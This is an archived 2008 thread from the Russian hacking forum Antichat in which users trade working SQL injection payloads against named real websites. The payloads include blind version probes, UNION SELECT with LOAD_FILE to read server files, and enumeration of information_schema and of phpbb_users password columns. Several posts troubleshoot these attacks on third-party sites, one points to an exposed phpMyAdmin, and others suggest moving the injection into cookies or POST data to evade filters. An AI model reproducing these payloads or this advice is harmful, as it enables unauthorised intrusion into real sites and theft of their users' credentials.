ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

22.03.2008, 16:51
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
Сообщение от jokester
2 bag
Я не пойму о каких сиволах ты уже 3 страницы спрашиваешь ?
ascii(lower(substring((select+version( )),1,1)))=0x35/*
Этот запрос показывает первый символ в версии базы если страница отобразилась то выражение верно в данном случае 1 символ=5(0x35)
Идентификация иньекции происходит не по выводу символов, почитай пожалуйста статьи
не проще
PHP код:
and 5=substring(version(),1,1)
? =\
__________________
|
|
|

22.03.2008, 16:54
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме: 99208
Репутация:
21
|
|
Здравствуйте, у меня два вопроса,
Первый - Пожскажите пожалуйста какую нибудь бажную CMS не сложную в установке, чтобы можно было поставить на localhost и отработать заливку шелла например.
Второе - я нашел уязвимый сайт и пытаюсь на нем прочесть файлы, путь до них беру из сообщения мускула об ошибке, но в место содержимого файла цифра за место каторой подставляю LOAD_FILE() просто не отбражается. Я уже и в hex кодировал, все равно не выводит файлы.
Сам сайт -
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,LOAD_FILE('/var/www/web7/web/show_videos.php'),3/*
- так ошибка мускула
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,LOAD_FILE(0x2f7661722f7777772f 776562372f7765622f73686f775f766964656f732e706870), 3/*
- так цифра не отображается
Там прав на чтение не хватает или что-то другое?
Последний раз редактировалось Spaise; 22.03.2008 в 16:56..
|
|
|

22.03.2008, 17:09
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме: 645316
Репутация:
327
|
|
_http://link.raid.ru/browse.php?cat=-1+union+select+version()/*
помогите раскрутить... ругается на from ..пробовал кодировать некатит...
|
|
|

22.03.2008, 17:14
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме: 645316
Репутация:
327
|
|
Spaise
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,user(),2,3/*
web7_u1@localhost
нет прав на чтение
|
|
|

22.03.2008, 17:16
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме: 645316
Репутация:
327
|
|
зато версия бд 5-ая
5.0.32-Debian_7etch1-log
можно раскрутить сам скуль..
|
|
|

22.03.2008, 17:17
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме: 99208
Репутация:
21
|
|
Сообщение от ReVOLVeR
_http://link.raid.ru/browse.php?cat=-1+union+select+version()/*
помогите раскрутить... ругается на from ..пробовал кодировать некатит...
http://link.raid.ru/phpmyadmin/
login: localhost
Таблиц нет, я в этом не специалист, но раз мускул использует, значит все таки таблы есть. )
|
|
|

22.03.2008, 17:20
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
Сообщение от ReVOLVeR
_http://link.raid.ru/browse.php?cat=-1+union+select+version()/*
помогите раскрутить... ругается на from ..пробовал кодировать некатит...
через куки from не фильтруется составляй свой запрос в куках, ну скорее и в пост не фильтруется
__________________
Карфаген должен быть разрушен...
|
|
|

22.03.2008, 17:20
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме: 645316
Репутация:
327
|
|
http://www.todobulla.cl/show_videos.php?id=-46+union+select+1,2,3,table_name+from+information_ schema.tables+limit+1,1/*
меняй лимит получиш таблицы..
|
|
|

22.03.2008, 17:22
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме: 99208
Репутация:
21
|
|
Сообщение от ReVOLVeR
http://www.todobulla.cl/show_videos.php?id=-46+union+select+1,2,3,table_name+from+information_ schema.tables+limit+1,1/*
меняй лимит получиш таблицы..
Мне не нужны таблици, я спрашивал про чтение файлов.
|
|
|

22.03.2008, 17:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
Непойму в чом прикол.
id=1'union+select+1,2,3,4,5,COLUMN_NAME,database() ,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHER E+TABLE_NAME='phpbb_users'+limit+1,1/*
выводит нормально
а когда пытаюсь прочитать так:
id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+phpbb_users+limit+1,1/*
выводит:
'phpbb_users' doesn't exist
__________________
BlackHat. MoDL
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|